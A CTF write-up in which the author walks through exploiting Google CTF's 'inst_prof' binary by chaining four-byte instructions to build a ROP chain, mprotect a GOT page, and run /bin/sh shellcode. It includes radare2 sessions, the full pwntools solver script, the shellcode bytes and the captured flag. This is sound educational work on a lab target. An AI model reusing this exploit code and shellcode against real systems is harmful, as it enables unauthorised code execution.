Plan B
Once we realized that mprotect
was called by the make_page_executable
function, we realized we could simply write some shellcode somewhere, make it executable, and then jump to it.
In theory.
We ruled out the page allocated by alloc_page
since it was marked non-writable while it was being executed. We took a stab at trying to mark some of the stack as executable, however we were unsuccessful (attributing the lack of success to some "unknown" feature of NX
, whereas I'd learn later that we were specifying an unaligned address to mprotect
)
It was at this point that we called it a night and I went to bed dreaming of armored assembly
.
The Next Day
After sleeping on it, I solidified the plan as follows:
1) Find writable region of memory
a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory
3) Set up call to `mprotect` through the `make_page_executable` call
a) Need to to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode
Reflecting upon the previous days' work, I realized that I needed region of memory that was always writable, and which would always be at a constant offset within the .text
section.
I originally performed all of the following work on a writable section located just above (visually; lower memory address) the page allocated by
alloc_page
and got it working reliably on my local machine. However after trying it remotely (against Google's challenge server), it became apparent that the section was not mapped at the same offset as on my local machine. Guessing at random addresses crossed my mind, however I dislike guessing when another solution can be found. It was then that I decided to refactor my solution to use the GOT as my target. The rest of this post explains the process I went through originally, but substituting the GOT section as my target rather than the failed one.
The Global Offset Table remained writable (due to only parital RELRO
) and was part of the contiguous section of memory mapped with the .text
section.
And fortunately there was a reference to the .text
section located at the top of the stack each time we entered the loop-executable
section:
[0x562e80db3b16]> pd 2
;-- rip:
0x562e80db3b16 b ffd3 call rbx
0x562e80db3b18 0f31 rdtsc
[0x562e80db3b16]> ds; pd 8
;-- map.unk2._rw_:
;-- rbx:
;-- rdi:
0x7fa9a763e000 b900100000 mov ecx, 0x1000 ; rsi
.-> 0x7fa9a763e005 90 nop
| 0x7fa9a763e006 90 nop
| 0x7fa9a763e007 90 nop
| 0x7fa9a763e008 90 nop
| 0x7fa9a763e009 83e901 sub ecx, 1
`=< 0x7fa9a763e00c 75f7 jne 0x7fa9a763e005
0x7fa9a763e00e c3 ret
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8 0x0000562e80db3b18 .;...V..
Notice in the highlighted lines that the instruction address after
call rbx
is at the top of the stack in our loop executable section
This is in fact the return address within do_test
pushed by the call rbx
instruction. To check that this return address was a constant offset from the Global Offset Table, I simply subtracted the return addresss from the GOT address, and re-ran the executable:
[0x7fa9a763e000]> iS~got
idx=22 vaddr=0x562e80fb4fd8 paddr=0x00001fd8 sz=40 vsz=40 perm=--rw- name=.got
idx=23 vaddr=0x562e80fb5000 paddr=0x00002000 sz=112 vsz=112 perm=--rw- name=.got.plt
[0x7fa9a763e000]> pxq 8 @ rsp
0x7ffd632550d8 0x0000562e80db3b18 .;...V..
[0x7fa9a763e000]> ? section..got.plt - [rsp]
2102504 0x2014e8 010012350 2M 20000:04e8 2102504 "\xe8\x14 " 001000000001010011101000 2102504.0 2102504.000000f 2102504.000000
The
iS
command is thei
nformation onS
ections command, which displays addresses of the different sections mapped by the process.The
?
command is used to perform math operations and returns the answer in a wide variety of formats.The
~
character appended to any command will filter the output much likegrep
does.
I saw that the GOT address was exactly 0x2014e8
past the return address. Closing and re-opening the program did not change this; however PIE did ensure that the text
section's base address was randomized on each execution (save for the last 12 bits). As long as I only used offsets relative to the text section address (provided as a return address from our looped section) then PIE (and ASLR) wouldn't do much to mitigate my efforts.
Seeing from our earlier dm
output above of the memory map that the GOT section was 8k in size, I knew I'd have plenty of space for both my shellcode and ROP chain.
And So ROP Begins...
The next challenge was how I'd get the address into the r15
register. I knew I could simply load the address from rsp
using mov r15, [rsp]
, which was a 4 byte instruction. But then I'd need to add to it the offset 0x2014e8
to get our GOT address.
My first thought was to simply use the inc r15
command several (hundred) times, but even utilizing the 0x1000
loops, it would take 0x2014e8 / 0x1000 == 513
calls to the loop to increment it enough times. Instead, I used the loop counter itself (rsi
== 0x1000
) as a starting value and doubled it 9 times to get the value into another placeholder register. This is where the exploit script started to take form, and here were the first few lines:
#!/usr/bin/env python2
from pwn import *
#open the process
p = process("./inst_prof")
#print program prompt
print(p.readline())
#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi
#and double it 9 times:
for x in range(9):
p.send("\x4d\x01\xf6\xc3") #add r14, r14
Note that for both the
add
instrucions that the last byte is0xc3
, which is theret
instruction; this shortcuts the loop letting the addition take place exactly 1 time.To generate the assembled bytes for these instructions I used the
rasm2
binary (which comes with radare2) with thekeystone
assembler:rasm2 -ax86.ks -b64 "add r14, r14"
. To install keystone assembler, user2pm init; r2pm update; r2pm -i keystone-lib; r2pm -i keystone
from a terminal prompt.
It was here I decided to test the script. To do so I added the import from IPython import embed
, and added embed()
to the script. This allowed me to pause execution (at any place within the script) and attach the r2
debugger to the running process to inspect its state. I simply ran the script with ./solver.py
, and after it dropped to the IPython shell, I switched to another terminal and attached to the process with r2
:
-> % r2 -d 14198
[0x7f30b1ae4360]> dr r13; dr r14; dr r15
0x55ec37271b18
0x00200000
0x00000000
And lo and behold, I had my text
section reference as well as the start of my offset calculation in r13
and r14
respectively.
To get the rest of the offset into the r14
register, I added a few more lines to the script to add 0x1000
, 0x246
* 2, and finally inc
rement 0x5c
more times to get the desired value:
#add another 0x1000 to r14:
p.send("\x49\x01\xf6\xc3") #add r14, rsi
#0x246 + 0x246 = 0x48c
for x in range(2):
p.send("\x4d\x01\xde\xc3") #add r14, r11
#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
p.send("\x49\xff\xc6\xc3") #inc r14
I'd noticed every time entering the
loop section
that ther11
register was set to0x246
, which I added to the offset in the highlighted line above
At this point I should have both the text section address in r13
, as well as the offset needed to reference the GOT in r14
. To test, I added the following line to my script to add r14
to r13
:
p.send("\x4d\x01\xf5\xc3") #add r13, r14
Then ran ./solver.py
and attached with r2:
[0x7fb876853360]> dr r13; dr r14; dr r15
0x558b57e11000
0x002014e8
0x00000000
[0x7fb876853360]> ? section..got.plt
94056963182592 0x558b57e11000 02530552770210000 87597.4G b57e1000:0000 94056963182592 "\x10\xe1W\x8bU" 010101011000101101010111111000010001000000000000 94056963182592.0 94056965210112.000000f 94056963182592.000000
Success! I had successfully calculated the offset from the loop section
's return address to the start of the GOT, and loaded it into one of our scratch registers.
Instead of writing shellcode all over the current GOT contents, I looked at the GOT section for an "empty" area:
[0x7fb876853360]> pxq @ section..got.plt
0x558b57e11000 0x0000000000201e08 0x00007fb876d3d0f0 .. ........v....
0x558b57e11010 0x00007fb876b2e5f0 0x00007fb8768533b0 ...v.....3.v....
0x558b57e11020 0x00007fb87685ca50 0x0000558b57c0f7d6 P..v.......W.U..
0x558b57e11030 0x00007fb876853350 0x00007fb876795420 P3.v.... Tyv....
0x558b57e11040 0x0000558b57c0f806 0x00007fb87685cb20 ...W.U.. ..v....
0x558b57e11050 0x00007fb87685cb50 0x0000558b57c0f836 P..v....6..W.U..
0x558b57e11060 0x0000558b57c0f846 0x0000558b57c0f856 F..W.U..V..W.U..
0x558b57e11070 0x0000000000000000 0x0000558b57e11078 ........x..W.U..
0x558b57e11080 0x0000000000000000 0x0000000000000000 ................
0x558b57e11090 0x0000000000000000 0x0000000000000000 ................
0x558b57e110a0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110b0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110c0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110d0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110e0 0x0000000000000000 0x0000000000000000 ................
0x558b57e110f0 0x0000000000000000 0x0000000000000000 ................
I selected the address on the highlighted line, which was 0xa0
past the GOT start. Since I'd learned that mprotect
would only work on addresses that were multiples of 0x1000
, I kept the GOT address in r13
for use in the ROP chain that I was planning to construct.
Second Stack
Now that I had reference to a writable region of memory, I set r15
to point 0xa0
pass the GOT where I'd place all my data for the exploit, including the shellcode and the ROP chain.
First I set r14
to 0xa0:
p.send("\x4d\x31\xf6" + ret) #xor r14, r14
for x in range(0xa0):
p.send("\x49\xff\xc6" + ret) #inc r14
It was here that I'd decided that I'd want a way to distinguish easily the 3 and 4 byte instructions, so I refactored all the instructions with
ret
bytes to instead append aret
variable whereret == '0xc3'
Then set r15
to r13
+ r14
:
#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13
#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14
Since my plan was to use r15
as the cursor into the second stack, I set r14
to this address:
p.send("\x4d\x89\xfe" + ret) #mov r14, r15
I was now ready to send my shellcode and inspect my second stack and registers, so that's what I did, adding the writeByteStr()
function and directive to my solver script. This is what it looked like at that point:
#!/usr/bin/env python2
from pwn import *
ret = "\xc3"
def writeByteStr(byteString):
writeCmd = '\x41\xc6\x07' #mov byte [r15], {}
incCmd = '\x49\xff\xc7' #inc r15
for b in byteString:
p.send(writeCmd + b)
p.send(incCmd + ret)
#open the process
p = process("./inst_prof")
#print program prompt
print(p.readline())
#now we get the return address (text section reference) into r13:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
#now we need the 0x1000 value into r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi
#and double it 9 times:
for x in range(9):
p.send("\x4d\x01\xf6" + ret) #add r14, r14
#add another 0x1000 to r14:
p.send("\x49\x01\xf6" + ret) #add r14, rsi
#0x246 + 0x246 = 0x48c
for x in range(2):
p.send("\x4d\x01\xde" + ret) #add r14, r11
#0x201000 + 0x48c = 0x20148c
#0x2014e8 - 0x20148c = 0x5c
for x in range(0x5c):
p.send("\x49\xff\xc6" + ret) #inc r14
p.send("\x4d\x01\xf5" + ret) #add r13, r14
p.send("\x4d\x31\xf6" + ret) #xor r14, r14
for x in range(0xa0):
p.send("\x49\xff\xc6" + ret) #inc r14
#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13
#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14
#save second stack pointer
p.send("\x4d\x89\xfe" + ret) #mov r14, r15
#write shellcode to second stack
writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f\x62\x69\x6e\x2f\x73\x68' + \
'\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52\x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05')
And I launched it so I could inspect with r2 to see if everything was in working order:
-> % r2 -d 5703
[0x7f5463e3c360]> dr r13; dr r14; dr r15
0x558ef8c55000
0x558ef8c550a0
0x558ef8c550ca
[0x7f5463e3c360]> pxq 0x30 @ r14
0x558ef8c550a0 0x4850ec8948c03148 0x69622fffbb48e289 H1.H..PH..H../bi
0x558ef8c550b0 0x08ebc14868732f6e 0x89485250e7894853 n/shH...SH..PRH.
0x558ef8c550c0 0x3bb0e689485750e2 0x000000000000050f .PWH...;........
Excellent. We can see that r13
holds our GOT reference, while r14
points to the top of our second stack, and r15
points just past the last byte written (05
from my shellcode).
By this point I'd solved problems 1 and 2:
1) Find writable region of memory
a) Region must be a constant offset to some known, reference-able address
2) Write shellcode to that region of memory
And now had steps 3 and 4 left:
3) Set up call to `mprotect` through the `make_page_executable` call
a) Need to to find `pop rdi` gadget to get shellcode address above into `rdi`
4) Get `rip` to the shellcode
To Call or Not to Call
Having looked at the call to make_page_executable
from before, we saw that the first argument to mprotect
is passed as an argument to make_page_executable
in the rdi
register. Therefore I needed to find a pop rdi
gadget that I'd call prior to calling make_page_executable
in the ROP chain.
Fortunately, r2 has a handy ROP search tool:
[0x7f5464323000]> s main
[0x558ef8a53860]> dr r13; dr r14; dr r15
0x558ef8c55000
0x558ef8c550a0
0x558ef8c550ca
[0x558ef8a53860]> /R/ pop rdi
0x558ef8a53bc3 5f pop rdi
0x558ef8a53bc4 c3 ret
[0x558ef8a53860]> pxq 8 @ rsp
0x7ffcaacd0eb8 0x0000558ef8a53b18 .;...U..
[0x558ef8a53860]> ? 0x558ef8a53bc3 - [rsp]
171 0xab 0253 171 0000:00ab 171 "\xab" 10101011 171.0 171.000000f 171.000000
/R/
allows searching for ROP gadgets using a regular expression
In the first highlighted line above, I use the gadget search tool to find a pop rdi
gadget, and then calculate it's offset from the return address in [rsp]
, showing that the gadget is 0xab
past the return address.
At this point I needed an additional qword
of scratch space to work with, so I incremented my shellcode address by +8, leaving r14
pointing to a spare word on my second stack, to which I wrote the GOT address to. With this code change my current state of registers + seconds stack went from :
r13 == GOT address
r14 == 2nd stack base
r15 == 2nd stack cursor
[rsp] == text section reference
[r14] == shellcode
To:
r13 == scratch
r14 == 2nd stack base
r15 == 2nd stack cursor
[rsp] == text section reference
[r14] == GOT address
[r14+8] == shellcode
Or to illustrate with radare, it went from:
[0x558ef8a53860]> dr r13; dr r14; dr r15
0x558ef8c55000
0x558ef8c550a0
0x558ef8c550ca
[0x558ef8a53860]> pxq 0x40 @ r14
0x558ef8c550a0 0x4850ec8948c03148 0x69622fffbb48e289 H1.H..PH..H../bi
0x558ef8c550b0 0x08ebc14868732f6e 0x89485250e7894853 n/shH...SH..PRH.
0x558ef8c550c0 0x3bb0e689485750e2 0x000000000000050f .PWH...;........
0x558ef8c550d0 0x0000000000000000 0x0000000000000000 ................
To:
[0x55eefe549b16]> dr r13; dr r14; dr r15
0x55eefe74b000
0x55eefe74b0a0
0x55eefe74b0d2
[0x55eefe549b16]> pxq 0x40 @ r14
0x55eefe74b0a0 0x000055eefe74b000 0x4850ec8948c03148 ..t..U..H1.H..PH
0x55eefe74b0b0 0x69622fffbb48e289 0x08ebc14868732f6e ..H../bin/shH...
0x55eefe74b0c0 0x89485250e7894853 0x3bb0e689485750e2 SH..PRH..PWH...;
0x55eefe74b0d0 0x000000000000050f 0x0000000000000000 ................
Now that the GOT address was saved at [r14]
, this freed up r13
to do some more offset calculation needed for the pop rdi
gadget I found.
I simply needed [rsp] + 0xab
to start my rop chain, which I accomplished via:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xab):
p.send("\x49\xff\xc5" + ret) #inc r13
#save pop addr on rop stack:
p.send("\x4d\x89\x2f" + ret) #mov [r15], r13
r15
now holds the start of our rop chain, which is the pop rdi
gadget's address. Since ROP depends fully on the state of the rsp
register (and the memory region it points to), we have to make sure that the pop rdi
gadget will pop the correct value into rdi
, which needs to be the argument we want to supply to make_page_executable
, namely the page-aligned address of the GOT we want to mark as executable.
So I load this from our previously saved location at r14
into r13
, and write that to our second stack plus 8:
p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
p.send("\x4d\x89\x6f\x08") #mov [r15+8], r13
At this point, our second stack looks like this (logically):
+------------------------+ ;r14
| GOT address |
+------------------------+
| |
| Shellcode |
| |
+------------------------+ ;r15
| pop rdi gadget |
+------------------------+
| GOT address |
+------------------------+
And with radare2
:
[0x55ba1eb91b16]> dr r13; dr r14; dr r15
0x55ba1ed93000
0x55ba1ed930a0
0x55ba1ed930d2
[0x55ba1eb91b16]> pxq 0x40 @ r14
0x55ba1ed930a0 0x000055ba1ed93000 0x4850ec8948c03148 .0...U..H1.H..PH
0x55ba1ed930b0 0x69622fffbb48e289 0x08ebc14868732f6e ..H../bin/shH...
0x55ba1ed930c0 0x89485250e7894853 0x3bb0e689485750e2 SH..PRH..PWH...;
0x55ba1ed930d0 0x55ba1eb91bc3050f 0x55ba1ed930000000 .......U...0...U
[0x55ba1eb91b16]> pxq 0x20 @ r15
0x55ba1ed930d2 0x000055ba1eb91bc3 0x000055ba1ed93000 .....U...0...U..
0x55ba1ed930e2 0x0000000000000000 0x0000000000000000 ................
[0x55ba1eb91b16]> pd 2 @ [r15]
0x55ba1eb91bc3 5f pop rdi
0x55ba1eb91bc4 c3 ret
note that the value in
r15
is not 8-byte aligned, so it's hard to see where the ROP chain starts when looking at the firstpxq
output atr14
, which is why I repeat thepxq
at ther15
register, where thepop rdi
gadget and GOT address are more easily seen and recognized.
All that's left is to add the mprotect
call and our shellcode address to the ROP chain.
To do that, we have to calculate the offset from [rsp]
to make_page_executable
:
[0x7f88cc42b000]> ? sym.make_page_executable - [rsp]
-248 0xffffffffffffff08 01777777777777777777410 17179869184.0G fffff000:0f08 -248 "\b\xff\xff\xff\xff\xff\xff\xff" 1111111111111111111111111111111111111111111111111111111100001000 -248.0 -248.000000f -248.000000
[0x7f88cc42b000]> ? [rsp] - sym.make_page_executable
248 0xf8 0370 248 0000:00f8 248 "\xf8" 11111000 248.0 248.000000f 248.000000
Unlike before, our target address is before the loop section's return address, meaning we need to decrement the text section reference address by 0xf8
to get the call to make_page_executable
:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xf8):
p.send("\x49\xff\xcd" + ret) #dec r13
And then add this to our ROP chain:
p.send("\x4d\x89\x6f\x10") #mov [r15+0x10], r13
Now the second stack + rop chain looks like this:
+--------------------------------+ ;r14
| GOT address |
+--------------------------------+
| |
| Shellcode |
| |
+--------------------------------+ ;r15
| pop rdi gadget |
+--------------------------------+
| GOT address |
+--------------------------------+
| make_page_executable gadget |
+--------------------------------+
We simply need to get our shellcode address at the end of this rop chain, and then set rsp
to the start of our rop chain.
#save current second stack pointer into r13:
p.send("\x4d\x89\xfd" + ret) #mov r13, r15
#advance pointer 3 qwords
for x in range(0x18):
p.send("\x49\xff\xc5" + ret) #inc r13
#point r14 to our shellcode
for x in range(0x8):
p.send("\x49\xff\xc6" + ret) #inc r14
#and write shellcode address here:
p.send("\x4d\x89\x75\x00") #mov [r13], r14
I had originally tried
mov [r15+0x18], [r14+0x8]
, however it turns out you can't do two dereferences in a single mov instruction, so I ended up removing (unnecessarily) both dereferences by splitting the instruction into two explicitmov
s. I could have avoided working with the second stack pointer (throughr13
) and simplymov [r15+0x18], r14
, however at the time I didn't notice this.
Now the second stack should be set up like so:
+--------------------------------+
| GOT address |
+--------------------------------+ ;r14
| |
| Shellcode |
| |
+--------------------------------+ ;r15
| pop rdi gadget |
+--------------------------------+
| GOT address |
+--------------------------------+
| make_page_executable gadget |
+--------------------------------+ ;r13
| <shellcode address> |
+--------------------------------+
And we verify:
[0x7f0e471a5000]> dr r13; dr r14; dr r15
0x56103a1800ea
0x56103a1800a8
0x56103a1800d2
[0x7f0e471a5000]> pxq 0x60 @ r14 - 0x8
0x56103a1800a0 0x000056103a180000 0x4850ec8948c03148 ...:.V..H1.H..PH
0x56103a1800b0 0x69622fffbb48e289 0x08ebc14868732f6e ..H../bin/shH...
0x56103a1800c0 0x89485250e7894853 0x3bb0e689485750e2 SH..PRH..PWH...;
0x56103a1800d0 0x561039f7ebc3050f 0x56103a1800000000 .....9.V.....:.V
0x56103a1800e0 0x561039f7ea200000 0x56103a1800a80000 .. ..9.V.....:.V
0x56103a1800f0 0x0000000000000000 0x0000000000000000 ................
[0x7f0e471a5000]> pxq 0x30 @ r15
0x56103a1800d2 0x0000561039f7ebc3 0x000056103a180000 ...9.V.....:.V..
0x56103a1800e2 0x0000561039f7ea20 0x000056103a1800a8 ..9.V.....:.V..
0x56103a1800f2 0x0000000000000000 0x0000000000000000 ................
[0x7f0e471a5000]> pd 2 @ [r15]
0x561039f7ebc3 5f pop rdi
0x561039f7ebc4 c3 ret
[0x7f0e471a5000]> pd 6 @ [r15 + 0x10]
| ;-- make_page_executable:
| 0x561039f7ea20 55 push rbp
| 0x561039f7ea21 ba05000000 mov edx, 5
| 0x561039f7ea26 be00100000 mov esi, 0x1000 ; rsi
| 0x561039f7ea2b 4889e5 mov rbp, rsp
| 0x561039f7ea2e 5d pop rbp
`=< 0x561039f7ea2f e9ecfdffff jmp sym.imp.mprotect
[0x7f0e471a5000]> pd 16 @ [r15 + 0x18]
;-- r14:
0x56103a1800a8 4831c0 xor rax, rax
0x56103a1800ab 4889ec mov rsp, rbp
0x56103a1800ae 50 push rax
0x56103a1800af 4889e2 mov rdx, rsp
0x56103a1800b2 48bbff2f6269. movabs rbx, 0x68732f6e69622fff
0x56103a1800bc 48c1eb08 shr rbx, 8
0x56103a1800c0 53 push rbx
0x56103a1800c1 4889e7 mov rdi, rsp
0x56103a1800c4 50 push rax
0x56103a1800c5 52 push rdx
0x56103a1800c6 4889e2 mov rdx, rsp
0x56103a1800c9 50 push rax
0x56103a1800ca 57 push rdi
0x56103a1800cb 4889e6 mov rsi, rsp
0x56103a1800ce b03b mov al, 0x3b ; ';' ; 59
0x56103a1800d0 0f05 syscall
I use the
pd
commands above to illustrate that each address (save for the GOT address) atr15
points to the appropriate address in the executable for our ROP chainThe last
pd
at[r15 + 0x18]
shows my disassembled shellcode. I had to update my shellcode for this challenge to setrsp
to point back at the original stack space stored inrbp
(highlighted above) because the GOT was no longer marked as writable (which the stack needs to be, since I usedpush
instructions in my shellcode).
All that's left is to load our rop chain address in r15
into rsp
, and watch it rain shell:
p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret
At this point I tested locally, getting a shell locally, before re-instrumenting and ever so slightly refactoring the code to launch it remotely.
The Sweet, Sweet Solution
I thought about refactoring the code so that my brazenly bullheaded way of inputting/running assembly commands would be less obvious, however I decided to just leave it in (more or less) the form it was in when I actually got the flag.
Something I found interesting about the solution for this challenge is that unlike in prior CTFs, we didn't have to rely on any information leakage at all. Indeed, it wasn't until the CTF was over and I saw some others' techniques for solving this challenge that I saw that we could have used the
r12
register to leak data (albeit in a slightly obfuscated manner) with the subsequent call towrite()
that the program made.Also, I now know that pwntools has an
asm()
function that will simplify my life in the future ;)
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 | #!/usr/bin/env python2
from pwn import *
from time import sleep
from IPython import embed
ret = "\xc3"
testing = True
if testing:
p = process("./inst_prof")
#p = remote("127.0.0.1", 9090)
else:
p = remote("inst-prof.ctfcompetition.com", 1337)
#context.timeout = 0.2
sleep(5.5)
def writeByteStr(byteString):
writeCmd = '\x41\xc6\x07' #mov byte [r15], {}
incCmd = '\x49\xff\xc7' #inc r15
for b in byteString:
p.send(writeCmd + b)
p.send(incCmd + ret)
def shiftR15Qword():
for x in range(8):
p.send("\x49\xff\xc7\xc3") #inc r15
def main():
#read inital output:
print(p.readline())
#now program is waiting for our 4 bytes
#first we create our "2nd stack" where we'll store our ROP
#chain:
#get text section reference:
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
#constant offset from text.seg.ref to GOT:
#[rsp] + 0x2014e8 == GOT
#go 0xa0 further than that to get to blank section
#total == [rsp] + 0x2014e8 + 0xa0 == 0x201588
#get offset into r14 (r14 is 0 right now):
p.send("\x49\x01\xf6" + ret) #add r14, rsi #rsi == 0x1000
#now double r14 9 times:
for x in range(0x9):
p.send("\x4d\x01\xf6" + ret) #add r14, r14
#now r14 is 0x200000, add another 0x1000:
p.send("\x49\x01\xf6" + ret) #add r14, rsi
#0x588 left
#r11 seems to be 0x246 all the time....
for x in range(2):
p.send("\x4d\x01\xde" + ret) #add r14, r11
#0x5c + 0xa0 left:
for x in range(0x5c):
p.send("\x49\xff\xc6" + ret) #inc r14
#now we have GOT Address, save it:
p.send("\x4d\x01\xf5" + ret) #add r13, r14
#clear r14:
p.send("\x4d\x31\xf6" + ret) #xor r14, r14
for x in range(0xa0):
p.send("\x49\xff\xc6" + ret) #inc r14
#now copy to r15:
p.send("\x4d\x89\xef" + ret) #mov r15, r13
#now add r15, r14:
p.send("\x4d\x01\xf7" + ret) #add r15, r14
#save second stack pointer
p.send("\x4d\x89\xfe" + ret) #mov r14, r15
#get r15 past our saved text section ref
shiftR15Qword()
#now lets write our shellcode:
writeByteStr('\x48\x31\xc0\x48\x89\xec\x50\x48\x89\xe2\x48\xbb\xff\x2f' + \
'\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7\x50\x52' + \
'\x48\x89\xe2\x50\x57\x48\x89\xe6\xb0\x3b\x0f\x05')
#save GOT address at [r14]:
p.send("\x4d\x89\x2e" + ret) #mov [r14], r13
#now we need pop rdi gadget
#pop rdi == [rsp] + 0xab
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xab):
p.send("\x49\xff\xc5" + ret) #inc r13
#save pop addr on rop stack:
p.send("\x4d\x89\x2f" + ret) #mov [r15], r13
#save addr of region to be mprotected as 1st rop gadget arg:
p.send("\x4d\x8b\x2e" + ret) #mov r13, [r14]
p.send("\x4d\x89\x6f\x08") #mov [r15+8], r13
#now we need to call mprotect and jump to shellcode:
#mprotect is [rsp] - 0xf8
p.send("\x4c\x8b\x2c\x24") #mov r13, [rsp]
for x in range(0xf8):
p.send("\x49\xff\xcd" + ret) #dec r13
#push mprotect gadget:
p.send("\x4d\x89\x6f\x10") #mov [r15+0x10], r13
#save current second stack pointer into r13:
p.send("\x4d\x89\xfd" + ret) #mov r13, r15
#advance pointer 3 words
for x in range(0x18):
p.send("\x49\xff\xc5" + ret) #inc r13
#point r14 to our shellcode
for x in range(0x8):
p.send("\x49\xff\xc6" + ret) #inc r14
#and write shellcode address here:
p.send("\x4d\x89\x75\x00") #mov [r13], r14
#embed()
#now we set rsp == r15 and let it "rip"..heh
p.send("\x4c\x89\xfc\xc3") #mov rsp, r15; ret
p.interactive()
if __name__ == "__main__":
main()
|
And here is what it looked like running it:
-> % ./solver.py
[+] Opening connection to inst-prof.ctfcompetition.com on port 1337: Done
initializing prof...ready
[*] Switching to interactive mode
b\x10\x00\x00\x00\x00\x00\x00Y\x00\x00...
...<redacted lots of bytes>...
...\x00\x00\x00\x00\x00�\x00\x00\x00\x00\x00\x00\x11\xls
$ ls
flag.txt
inst_prof
$ cat flag.txt
CTF{0v3r_4ND_0v3r_4ND_0v3r_4ND_0v3r}
$ exit
[*] Got EOF while reading in interactive
Post-Exploitation
Overall I found this challenge quite instructive, further deepening my understanding of libc function calls, system calls, and x86 in general. I'd like to thank Google for putting on such a fun CTF, as well as my friend Ambrose for staying up with me and working on such a large part of this challenge.
Of course I wouldn't be able to do this with out the proper tools, so I thank the radare2 team for such a great tool, as well as the Pwntools team for theirs.
Please let me know if there are any parts of this writeup that are unclear, or worse, incorrect, and I'll be glad to try fixing them, as well as glad to know that someone has read some of it. I hope that there is something in here that helps you too.
Until next time!
-Chris